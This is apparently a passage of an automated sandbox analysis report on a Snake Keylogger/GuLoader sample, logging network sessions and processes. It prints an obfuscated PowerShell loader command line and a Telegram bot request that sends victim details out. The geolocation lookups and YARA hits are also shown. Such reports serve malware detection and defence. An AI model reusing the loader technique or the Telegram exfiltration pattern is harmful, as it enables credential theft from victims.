                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Age: 104193
                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                                  last-modified: Mon, 24 Feb 2025 02:31:11 GMT
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s5akqbuZbEgNTFu7GvJSLkYorXUoq%2BOnO80UU%2FvBYYtx4O6VI94GVAEkwBgZ35OUQJ%2FcVVJ34QHyRNYd4my1yx0J%2BLtSkEyqkTWkbOsqFqvNOxJwnb7St0IuRjD37aoGr%2Bd0oIl%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9175f97dcbd472a4-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1926&min_rtt=1922&rtt_var=728&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1494370&cwnd=214&unsent_bytes=0&cid=0d23888189d5cef5&ts=130&x=0"
                                                                                                                                                                  2025-02-25 07:27:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  5192.168.2.449848104.21.96.14435660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-02-25 07:27:45 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                  2025-02-25 07:27:45 UTC852INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:45 GMT
                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Age: 104194
                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                                  last-modified: Mon, 24 Feb 2025 02:31:11 GMT
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wb36SL5B2iVPRd2w88h0BjANtil9fDr5wFQI3XVONm2kbO8MRs5pIvcEgGT%2FZDor4YGJ8V326OS4q6CLEwCcFapQaQZO9ALDoeJ8WvHGrw2ebADModVd7l40NiX8%2BxgaRqpMHGMY"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9175f9859d5ade9a-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1590&min_rtt=1587&rtt_var=602&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1806930&cwnd=233&unsent_bytes=0&cid=18046828db7097d7&ts=128&x=0"
                                                                                                                                                                  2025-02-25 07:27:45 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  6192.168.2.449855104.21.96.14435660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-02-25 07:27:46 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                  2025-02-25 07:27:46 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:46 GMT
                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Age: 104195
                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                                  last-modified: Mon, 24 Feb 2025 02:31:11 GMT
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vm%2Bxrwwp8zGJL7TzzowsLx37CbdupoyLB9TPbu6rzxubp2jnJ2hpwU%2Fz4ZlcJvFwvIENvBCjadkjEeP2zB%2FcmhPhcXc0ipF0yo6Y2Pa5Hfibhwsknjy73xTXFa4EiONnZ8%2BsKmlX"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9175f98cfcf342c0-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1724&min_rtt=1714&rtt_var=663&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1626740&cwnd=223&unsent_bytes=0&cid=83621dd4e283f76f&ts=130&x=0"
                                                                                                                                                                  2025-02-25 07:27:46 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  7192.168.2.449865104.21.96.14435660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-02-25 07:27:48 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  2025-02-25 07:27:48 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:48 GMT
                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Age: 104197
                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                                  last-modified: Mon, 24 Feb 2025 02:31:11 GMT
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Um7NGyJRNPUhzI57v6sKplxH01MMo8W9gC65ClYIp87PJJgKtTfwIOcMjnN0tbdVYwom89SCcpOCHw7Y25jB2FhwAPZ7wj%2BwtNaIdnHoTQA%2BOv8p%2FKkyOYRhldo4W%2FauidrBvoiz"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9175f996e98bde9a-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1648&rtt_var=620&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1760096&cwnd=233&unsent_bytes=0&cid=4e14516f1f34b805&ts=152&x=0"
                                                                                                                                                                  2025-02-25 07:27:48 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  8192.168.2.449875104.21.96.14435660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-02-25 07:27:49 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  2025-02-25 07:27:49 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:49 GMT
                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Age: 104198
                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                                  last-modified: Mon, 24 Feb 2025 02:31:11 GMT
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CO4W96OshuKnzN%2F0n4oUjAPv%2FhIv92KDXbrjUsCQsfFK2m3ZLS4ADVcclZ%2F7mfW5Icp1FedQ%2Bx44sz3wxFsBIxstwiWce6ycXq9TDogJtIrFFJy6u1zqSXFtrntuA3H1QmYApK1f"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9175f99e9a57c32e-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1657&min_rtt=1650&rtt_var=634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1706604&cwnd=192&unsent_bytes=0&cid=af8c3f1f62919bd8&ts=150&x=0"
                                                                                                                                                                  2025-02-25 07:27:49 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  9192.168.2.449887104.21.96.14435660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-02-25 07:27:51 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  2025-02-25 07:27:51 UTC856INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:51 GMT
                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Age: 104200
                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                                  last-modified: Mon, 24 Feb 2025 02:31:11 GMT
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r7N7HLuM6Z1rUsuZ5TauLHDGbbsLOrYuUNec09LMkENkL02lLfVZW9LdsNZOcZ3UpDPprddMCLp3%2FALR1AiYiub%2BOcm3Ush1utpq6twih08o4Im7i%2FAyeeDyzlaEP%2BrmARuLajft"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9175f9a96d59de9a-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1622&min_rtt=1618&rtt_var=615&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1767554&cwnd=233&unsent_bytes=0&cid=bdb4e3c23f183cc4&ts=149&x=0"
                                                                                                                                                                  2025-02-25 07:27:51 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  10192.168.2.449899104.21.96.14435660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-02-25 07:27:52 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  2025-02-25 07:27:52 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:52 GMT
                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                  Content-Length: 362
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Age: 104201
                                                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                                                  cf-cache-status: HIT
                                                                                                                                                                  last-modified: Mon, 24 Feb 2025 02:31:11 GMT
                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PYYzejeSOPZBzuSTq9HaPW4n2cc3RwhvBIti%2BlSRBcEMX41X9YDaUXprU85wdwzN5Zvev%2BRa%2BNGMnky7VaGR5sesglIP0cBEvmQ5pn7gFWgYpZV2S8VY6at25FGXLWPcJzeOIM8W"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                  CF-RAY: 9175f9b12d99de9a-EWR
                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1654&min_rtt=1653&rtt_var=623&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1751649&cwnd=233&unsent_bytes=0&cid=48c042a8377321e3&ts=145&x=0"
                                                                                                                                                                  2025-02-25 07:27:52 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  11192.168.2.449905149.154.167.2204435660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  2025-02-25 07:27:53 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:305090%0D%0ADate%20and%20Time:%2025/02/2025%20/%2014:12:39%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20305090%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                                                  Host: api.telegram.org
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  2025-02-25 07:27:53 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:53 GMT
                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                  Connection: close
                                                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                                                  2025-02-25 07:27:53 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                  Click to jump to process

                                                                                                                                                                  Target ID:0
                                                                                                                                                                  Start time:02:26:35
                                                                                                                                                                  Start date:25/02/2025
                                                                                                                                                                  Path:C:\Users\user\Desktop\Balance Pendiente.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\Balance Pendiente.exe"
                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                  File size:507'280 bytes
                                                                                                                                                                  MD5 hash:E70E71A31781B44F850A39693784CE74
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:low
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:1
                                                                                                                                                                  Start time:02:26:37
                                                                                                                                                                  Start date:25/02/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)"
                                                                                                                                                                  Imagebase:0xbd0000
                                                                                                                                                                  File size:433'152 bytes
                                                                                                                                                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2174295669.000000000A3CE000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:2
                                                                                                                                                                  Start time:02:26:37
                                                                                                                                                                  Start date:25/02/2025
                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:true

                                                                                                                                                                  Target ID:6
                                                                                                                                                                  Start time:02:27:19
                                                                                                                                                                  Start date:25/02/2025
                                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                  Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                                                                                                  Imagebase:0x8e0000
                                                                                                                                                                  File size:59'904 bytes
                                                                                                                                                                  MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                  Yara matches:
                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2993742272.0000000021E86000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2993742272.0000000021D81000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                  Reputation:high
                                                                                                                                                                  Has exited:false

                                                                                                                                                                  Reset < >